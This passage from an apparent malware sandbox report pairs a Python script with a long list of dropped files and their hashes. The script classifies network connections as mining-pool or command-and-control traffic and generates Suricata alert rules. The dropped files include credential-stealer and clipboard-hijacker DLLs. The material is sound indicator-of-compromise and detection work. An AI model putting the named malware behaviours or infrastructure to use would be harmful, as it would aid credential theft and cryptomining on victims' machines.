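    for line in text.strip().splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Country":
            continue
        country, dest, domain, proto = cells
        if proto == "" and domain.lower() in ("tcp", "udp"):  # shifted row
            domain, proto = "", domain
        ip, _, port = dest.rpartition(":")
        records.append({"country": country, "ip": ip, "port": int(port),
                        "domain": None if domain in ("", "N/A") else domain.lower(),
                        "proto": proto.lower()})
    return records


def classify(rec: dict) -> str:
    """Editor's heuristic category for one connection record."""
    ip = ipaddress.ip_address(rec["ip"])
    domain = rec["domain"] or ""
    if rec["port"] == 53 and rec["proto"] == "udp":
        return "dns-noise" if domain.endswith(".in-addr.arpa") else "dns-query"
    if ip.is_multicast or ip.is_private or ip.is_link_local:
        return "local-noise"
    if _under(domain, BENIGN_SUFFIXES):
        return "browser-benign"
    if _under(domain, MINING_SUFFIXES):
        return "mining-pool"
    if rec["port"] not in (80, 443):
        return "c2-nonstandard-port"
    if domain == "" or domain == rec["ip"]:
        return "raw-ip-http"
    return "http-named-host"


def iocs(records: list[dict]) -> list[dict]:
    """Unique (ip, port, proto) endpoints worth blocking, with category."""
    seen: dict[tuple, dict] = {}
    for rec in records:
        cat = classify(rec)
        if cat in IGNORED:
            continue
        key = (rec["ip"], rec["port"], rec["proto"])
        seen.setdefault(key, {"ip": rec["ip"], "port": rec["port"], "proto": rec["proto"],
                              "domain": rec["domain"], "category": cat})
    return sorted(seen.values(), key=lambda x: (x["category"], x["ip"], x["port"]))


def suspicious_domains(records: list[dict]) -> set[str]:
    """Hostnames contacted or queried that are neither PTR noise nor benign."""
    out = set()
    for rec in records:
        d = rec["domain"]
        if d and d != rec["ip"] and not d.endswith(".in-addr.arpa") \
                and not _under(d, BENIGN_SUFFIXES):
            out.add(d)
    return out


def suricata_rules(ioc_list: list[dict], sid_base: int = 9000001) -> list[str]:
    """One alert per endpoint; msg carries the category so analysts can triage."""
    return [f'alert {x["proto"]} $HOME_NET any -> {x["ip"]} {x["port"]} '
            f'(msg:"MAL db7da9a9 {x["category"]}"; flow:to_server; '
            f'classtype:trojan-activity; sid:{sid_base + n}; rev:1;)'
            for n, x in enumerate(ioc_list)]


if __name__ == "__main__":
    recs = parse_rows(NETWORK_ROWS)
    for x in iocs(recs):
        print(x)
    print(sorted(suspicious_domains(recs)))
    print("\n".join(suricata_rules(iocs(recs))))
```

The benign allowlist is suffix-anchored (domain equals the suffix or ends in "." plus it), so a lookalike such as notfacebook.com would still be flagged. Note that the DNS query for xmr-eu1.nanopool.org is excluded from the endpoint list (blocking 8.8.8.8 is not the goal) but surfaces through suspicious_domains(), which is where a DNS sinkhole or RPZ entry should come from.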
Files
memory/5000-0-0x0000000000400000-0x0000000000409000-memory.dmp
memory/5000-1-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3284-2-0x0000000000CE0000-0x0000000000CF6000-memory.dmp
memory/5000-3-0x0000000000400000-0x0000000000409000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9EEB.exe
| MD5 | 3323195a56ab4ecbd18a088c6c5fd2eb |
| SHA1 | 2cc0b6798b4f3b5c62dd85421ec9d519444b944a |
| SHA256 | f4838fd962450fe30a3189031d10a08a0f703fc7fd0dd212374bed41de10b37c |
| SHA512 | 4cc29d19dd5725781dd4f48ad508ee7efc79e1a42836221c93bb99c2ee2cc38d2f3494e983a545f84a1e3f1ec0c5f74744e6f6b65d72be610da175a96f6585be |
C:\Users\Admin\AppData\Local\Temp\A053.exe
| MD5 | e561df80d8920ae9b152ddddefd13c7c |
| SHA1 | 0d020453f62d2188f7a0e55442af5d75e16e7caf |
| SHA256 | 5484ca53027230772ae149e3d7684b7e322432ceb013b6bc2440bd3c269192ea |
| SHA512 | a7afed5a6434f296f0e0186de8ce87245bbd0f264498e327188a93551dd45e0e67409e62f3477b526ab5b0927e4349ad66107cbea7f7554b4be53c18227741a5 |
C:\Users\Admin\AppData\Local\Temp\A1EB.exe
| MD5 | 73089952a99d24a37d9219c4e30decde |
| SHA1 | 8dfa37723afc72f1728ec83f676ffeac9102f8bd |
| SHA256 | 9aa54a5b73fe93d789ec1707ebd41ff824fcf6ba34b18d97ebc566cee8cbce60 |
| SHA512 | 7088b995c0f6425ad4460b1f286d36e5b7ca3d79308febfac7f212e630b00569239e0b22455198739d20b1fbae1b70c24c22f41a34bab19a793aaa31164aa2d2 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\vF0Yw6Gv.exe
| MD5 | c9fecce5ddbbb4c08036eb804806585a |
| SHA1 | de118ddb2f2b644a73e314d1bfc9ff777b84c41c |
| SHA256 | 453554affb4477ef1397310265a6a90ae0953e5bca58d9b7b98e7323e7cccdf6 |
| SHA512 | 59be1a656c71b2dd3a2891a6b27e842f808074dffdd1b954d0ee781bab2183b048263e9381489223d97e74aff6cd8bfa825cab657c4b9aa9eba9d7f8d234faff |
C:\Users\Admin\AppData\Local\Temp\A11F.bat
| MD5 | 403991c4d18ac84521ba17f264fa79f2 |
| SHA1 | 850cc068de0963854b0fe8f485d951072474fd45 |
| SHA256 | ef6e942aefe925fefac19fa816986ea25de6935c4f377c717e29b94e65f9019f |
| SHA512 | a20aaa77065d30195e5893f2ff989979383c8d7f82d9e528d4833b1c1236aef4f85284f5250d0f190a174790b650280ffe1fbff7e00c98024ccf5ca746e5b576 |
C:\Users\Admin\AppData\Local\Temp\A298.exe
| MD5 | d2ed05fd71460e6d4c505ce87495b859 |
| SHA1 | a970dfe775c4e3f157b5b2e26b1f77da7ae6d884 |
| SHA256 | 3a119008fd025a394f6fb93a0c941e1dc0fa1f9c7606a674388f21d99dfe116f |
| SHA512 | a15efc7c5ddd82ea612444b5df530d11da43bbaaf7f7ae4801c8063c8cffe4538cd47e27639e380b9d1c7e342575169e06af4b298a8faf635865dc4f9dc11b8e |
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\JD7oZ9jo.exe
| MD5 | f0c7089254a00e815feae5d8181b7f05 |
| SHA1 | f3b024cb82395c32629ac49898728fd5010c26cf |
| SHA256 | 37bef7fe1c718f9ee1ffa18fe8fb3a516d1f464aaa536f02c18f1b63b58edd73 |
| SHA512 | b8fa039c87837355afed88b3b77abfabda3d30a2e887adac620ac204eb6bc30bac809ed6092d837424f3a2c0324641d057c3f90e100634396bb0fa27d4e3f6e0 |
C:\Users\Admin\AppData\Local\Temp\A345.exe
| MD5 | 4bd59a6b3207f99fc3435baf3c22bc4e |
| SHA1 | ae90587beed289f177f4143a8380ba27109d0a6f |
| SHA256 | 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236 |
| SHA512 | ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324 |
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
| MD5 | 4bd59a6b3207f99fc3435baf3c22bc4e |
| SHA1 | ae90587beed289f177f4143a8380ba27109d0a6f |
| SHA256 | 08e33db08288da47bbbe3a8d65a59e8536b05c464ba91dc66e08f9abd245e236 |
| SHA512 | ca7517384a5449145a819e45445ff9bbcb27ea1b9e2a63c13ef12e256475e0ccbf05031b5ab5cb83a24b2cdd37d425cc7b9044c660098d39f47f05e95bbb6324 |
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Yi0Qu7Ko.exe
| MD5 | b4050b917e28921affbf2dffa8246e5c |
| SHA1 | 44d3497d429695898e5230916d0ef0924d97c660 |
| SHA256 | 8a14bc158f2bab49eafd556bd51635a7102b322a4debb1f63fcb57dcb7f745f1 |
| SHA512 | 3680bf7579f36bcf440c349ea41f872bc36ca45297d1c384120844e86a3d8bf7e9c1af615dac4f6e93c5f32bcf3adfe95dbffaea802a2bcd2504395aa8abfa83 |
C:\Users\Admin\AppData\Local\Temp\A4DC.exe
| MD5 | 329bce2e07f7898910e3fd4e17b98d42 |
| SHA1 | 94d379a5964c97eefad6432608dd09b4ddb12b77 |
| SHA256 | 3c78b3067a13c0c8980f0cc9cac0c8d5a2ac8400c259405eebb907f3f7da349e |
| SHA512 | a3eaf12d4d6fffbae622ba50afef0eba19b24f25d3f6706abb5b4e8d7c05e3b0da6b2a4f0a0daa48d026ef4fc8205746cad90daff2d2a47edc7a90446649e7f2 |
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\dT9yG7Sf.exe
| MD5 | 4d6df12a24cadf74e6bf1190c60fdda2 |
| SHA1 | 7eaadf868c91ab8138f20f300b3b1258c83608fe |
| SHA256 | 03dd8bac72407083fc3d0017dcb1f7733700c553eaf4676f4505b20fb1d34d99 |
| SHA512 | 3421f21c5a3cb33a08a716de494a2cb58443b6a99cd47e13be3666a0ec671f48e50c032f0c8b96dbaa47bd77031b69c69ef29fb830b995f272f92eac1e8411a1 |
memory/3900-70-0x0000000072FB0000-0x0000000073760000-memory.dmp
memory/980-71-0x0000000000540000-0x000000000054A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Rs37xE9.exe
| MD5 | 7251c994d90ff3fd8068854ccd67a748 |
| SHA1 | 3e536fbb4b8d12e90eb0a67a7f728ee1479d0f19 |
| SHA256 | cd17f994e3027975bda505f96d1b218bbbd059c472495be222437a7aae651292 |
| SHA512 | 87239c495e10298df1427c2dbaf1c8f93705f89e9bb95dfdd45554fe7cecee7e1bed80586369893262fd26f4d740fdb3de99cf7c3601375d68143765d26d841a |
memory/980-75-0x0000000072FB0000-0x0000000073760000-memory.dmp
memory/3900-76-0x00000000005B0000-0x00000000005EE000-memory.dmp
memory/3900-84-0x00000000079B0000-0x0000000007F54000-memory.dmp
memory/3900-88-0x00000000074A0000-0x0000000007532000-memory.dmp
memory/4372-89-0x0000000000400000-0x000000000047E000-memory.dmp
memory/4372-90-0x00000000006B0000-0x000000000070A000-memory.dmp
memory/3900-91-0x0000000007690000-0x00000000076A0000-memory.dmp
memory/3900-95-0x0000000007490000-0x000000000749A000-memory.dmp
memory/4372-98-0x0000000072FB0000-0x0000000073760000-memory.dmp
memory/3900-99-0x0000000008580000-0x0000000008B98000-memory.dmp
memory/3900-101-0x0000000007700000-0x0000000007712000-memory.dmp
memory/3900-100-0x00000000077D0000-0x00000000078DA000-memory.dmp
memory/3900-103-0x0000000007760000-0x000000000779C000-memory.dmp
memory/3900-104-0x00000000078E0000-0x000000000792C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | f4787679d96bf7263d9a34ce31dea7e4 |
| SHA1 | ebbade52b0a07d888ae0221ad89081902e6e7f1b |
| SHA256 | bfcadaffd49f5351acf68b8249b32270424bc2459125818492cd3224662a9a87 |
| SHA512 | de3f3d1cd602bddb664bd0d2aecb661204dd239b278b1f03d6b9dca6f3d03bd3041ac42f4382f5edf5b310b17ff9ecddff59f16729e8c095625040a364252307 |
C:\Users\Admin\AppData\Local\Temp\C4E8.exe
| MD5 | dd879217d6270ce10527c1f4752e2602 |
| SHA1 | 9b95b9be2b977cf9b7f5b268e33b2a8abc438e3d |
| SHA256 | a406a3c1474a57c62f3dbd56aa15d5d732e6a0fe8bbfd7bce9425b132204da8b |
| SHA512 | 897e72e251fdab2b4a1a2a0f33df3e5e3ab931620614527bf483b196505f87ebdddd884881aa21fbc661b72ca5157cb60e3b6d21ca04c526c099b5439e75648d |
memory/3076-114-0x0000000072FB0000-0x0000000073760000-memory.dmp
memory/3076-117-0x0000000000AF0000-0x00000000014D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\C7D7.exe
| MD5 | 395e28e36c665acf5f85f7c4c6363296 |
| SHA1 | cd96607e18326979de9de8d6f5bab2d4b176f9fb |
| SHA256 | 46af9af74a5525e6315bf690c664a1ad46452fef15b7f3aecb6216ad448befaa |
| SHA512 | 3d22e98b356986af498ea2937aa388aeb1ac6edfeca784aae7f6628a029287c3daebcc6ab5f8e0ef7f9d546397c8fd406a8cdaf0b46dcc4f8716a69d6fb873de |
memory/4372-124-0x0000000000400000-0x000000000047E000-memory.dmp
memory/4372-125-0x0000000072FB0000-0x0000000073760000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CDE3.exe
| MD5 | ec332d52fa353ecf367019c9ae7ca1b1 |
| SHA1 | c32b2a20209248fd70511095ab34208ad31411a5 |
| SHA256 | 703a29e3d93624bc00dbd3507f0614f3ab23e294c5da1174264b36e9d2ec7926 |
| SHA512 | 035fb0c75d1e261c65d43028aca76f23d7975da4b3ff7a7c7330bdcdc549a9bdce6bf078c1c4e6db22055a7295c723d1b8a9e7bb958d549f015f703d929e6fee |
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
| MD5 | 4d1f0d9bfac03f5237d800cd61ed1133 |
| SHA1 | a8d2884e093ac24d23d48c804f617a0115fe697c |
| SHA256 | 2b6d2a194d0b61942c703bf307cf879f26e2dc4ab67cd77d5827e7422b287a18 |
| SHA512 | acc3da350a0b372b06cd996e35357239b3c2cf3b3cacf41b76b322c378f934217db67ec0a7efdc472b717dffb0014606fea765c4a79f0a60fc0966ec542824a9 |
memory/3900-149-0x0000000072FB0000-0x0000000073760000-memory.dmp
memory/980-154-0x0000000072FB0000-0x0000000073760000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
| MD5 | 5283cdd674c839582d319aabafaad58e |
| SHA1 | 04f113b8d35ed25942fcf11e830c3161004f5c18 |
| SHA256 | 46e15742c0c686e214623ca91a21ca993f9cce2c2c548b6ddb417662248ff9e2 |
| SHA512 | f3488dd33861a33f6d82f5ae575a5e07e9397cf8dcc17470b7e08f5d8da254980b35b34978cd2366de70964f184a43e7ac2bcb1c437b08495b15a8ff3c4e205d |
memory/980-169-0x0000000072FB0000-0x0000000073760000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\kos4.exe
| MD5 | 01707599b37b1216e43e84ae1f0d8c03 |
| SHA1 | 521fe10ac55a1f89eba7b8e82e49407b02b0dcb2 |
| SHA256 | cc0dbc1d31ccd9488695b690bd7e7aa4a90ba4b2a5d23ef48b296465f5aa44dd |
| SHA512 | 9f9ff29a12d26a7d42656e0faf970c908f1ef428b14e5a5fe7acd06371b96b16eb984e8fbee4e2b906c6db7fb39c9d4a221e79fc3d5e9ca9b59e377875bc5642 |
memory/4696-182-0x00000000007D0000-0x00000000007D8000-memory.dmp
memory/1900-184-0x0000000000550000-0x00000000005AA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\latestX.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA1 | 4a6352bb47c7e1666a60c76f9b17ca4707872bd9 |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
| SHA512 | 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | c147570bb7bd251cd5450651967370ed |
| SHA1 | 2419e17c08a89dd79f8047a2943e207abd0f1e8f |
| SHA256 | 30db1c698f7f53df3ba07d71a09e63cca89ba75adb41da0ed7b8ecb08f96085e |
| SHA512 | b8d5513440f5b4add18c46937afe821a525ae955ee90e2ed9558626f48eda2bcdb005ec5e15e0775a80723f98525c9d3f2c80e3611970cb30fb8e926c267ba13 |
memory/1900-207-0x0000000000400000-0x000000000047E000-memory.dmp
memory/1900-211-0x0000000072FB0000-0x0000000073760000-memory.dmp
memory/4696-214-0x0000000002740000-0x0000000002750000-memory.dmp
memory/3076-215-0x0000000072FB0000-0x0000000073760000-memory.dmp
memory/4696-191-0x00007FF9C6A50000-0x00007FF9C7511000-memory.dmp
memory/3900-216-0x0000000007690000-0x00000000076A0000-memory.dmp
\??\pipe\LOCAL\crashpad_3628_RKEHHLEYBEAYXZDG
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 36d9cc1d352a3ab0b7d54c86e9723767 |
| SHA1 | 86e9d4da198a2c42628e11dabcdd3032d18ccd21 |
| SHA256 | 1d95f3319102ddc7fbb59af8be9367d77fe4b79b374d14c5d843c6a3f75ee119 |
| SHA512 | 381f93f00f70147fe52b2556f65123771cac274a7a512072f67c7a8829430bdce8bf7cefbfea0cfbdc96501d6b4f409fccf9bf4a13c6738da56aa1c002d0881f |
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
| MD5 | 55447f754ed036c9ea0019c5b58206bd |
| SHA1 | e5066619176a8cbb6743d87cee2a2fb9a2926dd6 |
| SHA256 | 4a14afe4a03293e8abb10967647f48b6b3b00fdc6f966715f338269945da95e6 |
| SHA512 | 2d2a8a01cc6dd0efcfc3a6672f284665d933607c2f8bbdd85a96417e0088675142823c441c0c85735a8a8d517fdd9433061173a5b4a22d70273821fbf6821ccc |
C:\Users\Admin\AppData\Local\Temp\FEE7.exe
| MD5 | e2ff8a34d2fcc417c41c822e4f3ea271 |
| SHA1 | 926eaf9dd645e164e9f06ddcba567568b3b8bb1b |
| SHA256 | 4f26511d40ad3d781ff1bd4c643f9418b3fd0c4da6b769a1ff9ae4d07d8892d0 |
| SHA512 | 823d99704b761218b3de8f6b107378b529e7f718557b9e2b57ffb497310c4eccfc35c402bad28cdc2758ef254e55a936949c24468f07fc21e7e3efc0671beec2 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 031c15ffd895d182be9975ef5d6f2e6b |
| SHA1 | a23a5a08f02722d7701bb85fc6bc4f6b2a648263 |
| SHA256 | 41e9498c737c28e07bb7fc3023af1a31e19a605f44a6ecd29dbbaecb8eea8110 |
| SHA512 | 112efc87edcf0cc9f59301d7f888dce52c4944419d670ac160e9ef7045d5d2bdfe58dea331ad2c2b4d6bca15bd8cb3a71e830577be0fc28817c8473ac20ae6d6 |
memory/1900-276-0x0000000072FB0000-0x0000000073760000-memory.dmp
memory/4784-282-0x00000000001D0000-0x00000000005B0000-memory.dmp
memory/4696-280-0x00007FF9C6A50000-0x00007FF9C7511000-memory.dmp
memory/3956-283-0x00007FF71A0A0000-0x00007FF71A641000-memory.dmp
memory/4388-285-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences
| MD5 | 3a748249c8b0e04e77ad0d6723e564ff |
| SHA1 | 5c4cc0e5453c13ffc91f259ccb36acfb3d3fa729 |
| SHA256 | f98f5543c33c0b85b191bb85718ee7845982275130da1f09e904d220f1c6ceed |
| SHA512 | 53254db3efd9c075e4f24a915e0963563ce4df26d4771925199a605cd111ae5025a65f778b4d4ed8a9b3e83b558066cd314f37b84115d4d24c58207760174af2 |
C:\Users\Admin\AppData\Local\Temp\is-4NV9N.tmp\LzmwAqmV.tmp
| MD5 | e416b5593ef10377e8edc748ca6f2527 |
| SHA1 | d06fb79becff1bedd80f1b861449c8665af9aa67 |
| SHA256 | a7e400b62721851753ec6453e7eb3a5df4797149cfa1d3b0bf9db0a837863eb0 |
| SHA512 | 8e44b491f86779ab5a6834da0639952be11d6ab598f392cee28ed5dabd71b3b15330d872620c1d0d858024e0e09d81ab0f9addbde82c1695de22d0bdf8f5be7c |
memory/4268-297-0x0000000000400000-0x0000000000434000-memory.dmp
memory/4268-298-0x0000000000400000-0x0000000000434000-memory.dmp
memory/3076-305-0x0000000000640000-0x0000000000641000-memory.dmp
memory/4268-318-0x0000000000400000-0x0000000000434000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2MK152qh.exe
| MD5 | f9b01336b5bc1df7afbd26b4df09d8e9 |
| SHA1 | b4d987a003e90420853d1c6a232e9dd0ba6f06ae |
| SHA256 | 7495e5e90c41793f72907b0e1355d97a867a0874b95c81804bd3f461a77e5996 |
| SHA512 | 77618a417fd858f1b195e0761f1fe3346569c0c7499879654c3333723dd9887a3242ccce36e8a751f051d7fdec6bfc4ad60e5610354bd7bf1dd1d038bdff36c3 |
C:\Users\Admin\AppData\Local\Temp\is-BP7RS.tmp\_isetup\_iscrypt.dll
| MD5 | a69559718ab506675e907fe49deb71e9 |
| SHA1 | bc8f404ffdb1960b50c12ff9413c893b56f2e36f |
| SHA256 | 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc |
| SHA512 | e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63 |
memory/1900-321-0x0000000072FB0000-0x0000000073760000-memory.dmp
memory/1900-322-0x0000000000F90000-0x0000000000FCE000-memory.dmp
memory/1360-325-0x0000000002280000-0x0000000002289000-memory.dmp
memory/1360-324-0x0000000000890000-0x0000000000990000-memory.dmp
C:\Program Files (x86)\Drive Tools\zDriveTools.exe
| MD5 | 46e6bb577ceb65806ef24e900abf04a0 |
| SHA1 | 947f8ac53bbc779a51a48f5e7d9634720105b689 |
| SHA256 | b9763b0e13159d7ddedcd2ae757e9557a6f1d8081b2646ae4d9bebe845f9c451 |
| SHA512 | be03e8f7f4e2759022e0bbbf02c93fe4343f2f603c83b8e46e8387371de6a0d38221ea37b480f3e2135af3077e96f8c515b04d99aa4cd215e8db32c467513e4b |
memory/1912-368-0x0000000000400000-0x0000000000409000-memory.dmp
memory/5288-382-0x0000000000400000-0x0000000000636000-memory.dmp
memory/5288-385-0x0000000000400000-0x0000000000636000-memory.dmp
memory/4388-386-0x0000000000400000-0x0000000000414000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 72d1dadb8838b0a9e31b268b19869bab |
| SHA1 | 31f3cbaf16146a19898c19380b588356f605e00e |
| SHA256 | 311770a1f545d55c42589c057eb76a3be79d98fb9d61edc527373cb76ff048ff |
| SHA512 | e0e12a4eafb47d46eb247425c55a2e0f722ee3b3e5f5a2c671bd86b6efc697627c59e88b53d44a22079192b18d3a5de9f5d4603f3778252b6013bafce19bb856 |
memory/4784-384-0x0000000072FB0000-0x0000000073760000-memory.dmp
memory/5288-381-0x0000000000400000-0x0000000000636000-memory.dmp
memory/752-398-0x0000000002970000-0x0000000002D6D000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State
| MD5 | 285252a2f6327d41eab203dc2f402c67 |
| SHA1 | acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6 |
| SHA256 | 5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026 |
| SHA512 | 11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d |
memory/752-400-0x0000000002D70000-0x000000000365B000-memory.dmp
memory/1900-351-0x0000000007FA0000-0x0000000007FB0000-memory.dmp
memory/1912-348-0x0000000000400000-0x0000000000409000-memory.dmp
memory/752-402-0x0000000000400000-0x0000000000D1B000-memory.dmp
memory/5584-405-0x0000000000400000-0x0000000000636000-memory.dmp
memory/1912-406-0x0000000000400000-0x0000000000409000-memory.dmp
memory/3284-404-0x0000000002E80000-0x0000000002E96000-memory.dmp
memory/3076-403-0x0000000000640000-0x0000000000641000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\is-BP7RS.tmp\_isetup\_isdecmp.dll
| MD5 | a813d18268affd4763dde940246dc7e5 |
| SHA1 | c7366e1fd925c17cc6068001bd38eaef5b42852f |
| SHA256 | e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64 |
| SHA512 | b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4 |
memory/4784-411-0x0000000004C30000-0x0000000004C3A000-memory.dmp
memory/4784-412-0x0000000004C50000-0x0000000004C58000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 17bf4f77a7509da6e6b9e1071333b87b |
| SHA1 | 38975587dde1db7d2512d86745fc61dc05fc3ee5 |
| SHA256 | 9a0c38cf3371608ef0c32c30d08aaaca5a3e1d3d6ca2fdb53adfa9371f8066d8 |
| SHA512 | 98405958e9b0985f353667d354ae956a85447686f846d40d82aab87fe4c7d86cf52ef117084b65c63d0324376e526ae3621749c4cbc57011cae237949d3dd406 |
memory/4268-287-0x0000000000400000-0x0000000000434000-memory.dmp
memory/4784-284-0x0000000004E00000-0x0000000004E9C000-memory.dmp
memory/3076-433-0x0000000000400000-0x00000000004BA000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 3e12a950138959e9966e54b5b211bd99 |
| SHA1 | c5c3a48cb78ab44fd8fd41f5be5017504c781441 |
| SHA256 | 118487b4e4acc9fb9742ccf60d63ed18b384688183416c98e3e8969fa078fc97 |
| SHA512 | 6ba8442fe0713a77c827764dc67a9b9d22c326a390ace91f0ed76f5dee888f94313aeab87938a5ff4e04fed1a85d70703454a5eaa823bdd5f8d430d3aee0d073 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe593445.TMP
| MD5 | 9f096582052ea4c2ab71886cf2e9194f |
| SHA1 | bc03c2aa189c3576a9731eb08c152a11dd33837b |
| SHA256 | 94e9f83643e1c26e51bba131b6d68145e437cc133f945869f99d972d838ad093 |
| SHA512 | 52ae402d13a8b6dc816c64a904ee44fa73d1244f60efb4cfe0cf0bfc6d4b710574d58eaf3b62fe523171fd70cd29ef4f712a37baecdfd92326e01e181961d1b6 |
memory/4784-277-0x0000000072FB0000-0x0000000073760000-memory.dmp
memory/4388-262-0x0000000000400000-0x0000000000414000-memory.dmp
memory/4784-434-0x0000000005040000-0x00000000051D2000-memory.dmp
memory/1900-436-0x0000000072FB0000-0x0000000073760000-memory.dmp
memory/4784-441-0x0000000005030000-0x0000000005040000-memory.dmp
memory/4784-440-0x0000000005030000-0x0000000005040000-memory.dmp
memory/4784-442-0x0000000005030000-0x0000000005040000-memory.dmp
memory/1900-443-0x0000000007FA0000-0x0000000007FB0000-memory.dmp
memory/4784-445-0x0000000005030000-0x0000000005040000-memory.dmp
memory/4784-446-0x0000000005030000-0x0000000005040000-memory.dmp
memory/4784-444-0x0000000004FC0000-0x0000000004FD0000-memory.dmp
memory/4784-447-0x0000000005030000-0x0000000005040000-memory.dmp
memory/4908-452-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4908-456-0x0000000000400000-0x000000000041B000-memory.dmp
memory/4908-459-0x0000000000400000-0x000000000041B000-memory.dmp
memory/752-470-0x0000000000400000-0x0000000000D1B000-memory.dmp
memory/5584-471-0x0000000000400000-0x0000000000636000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 6752a1d65b201c13b62ea44016eb221f |
| SHA1 | 58ecf154d01a62233ed7fb494ace3c3d4ffce08b |
| SHA256 | 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd |
| SHA512 | 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389 |
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vsalkb3i.smm.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/752-545-0x0000000000400000-0x0000000000D1B000-memory.dmp
memory/5584-546-0x0000000000400000-0x0000000000636000-memory.dmp
memory/3956-575-0x00007FF71A0A0000-0x00007FF71A641000-memory.dmp
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
| MD5 | a5b509a3fb95cc3c8d89cd39fc2a30fb |
| SHA1 | 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c |
| SHA256 | 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529 |
| SHA512 | 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9 |
C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
| MD5 | e913b0d252d36f7c9b71268df4f634fb |
| SHA1 | 5ac70d8793712bcd8ede477071146bbb42d3f018 |
| SHA256 | 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da |
| SHA512 | 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity
| MD5 | 63b301927b6a4239c88e47bf445afc3b |
| SHA1 | 404977ba52ca98965232e182bfda820f5f122a31 |
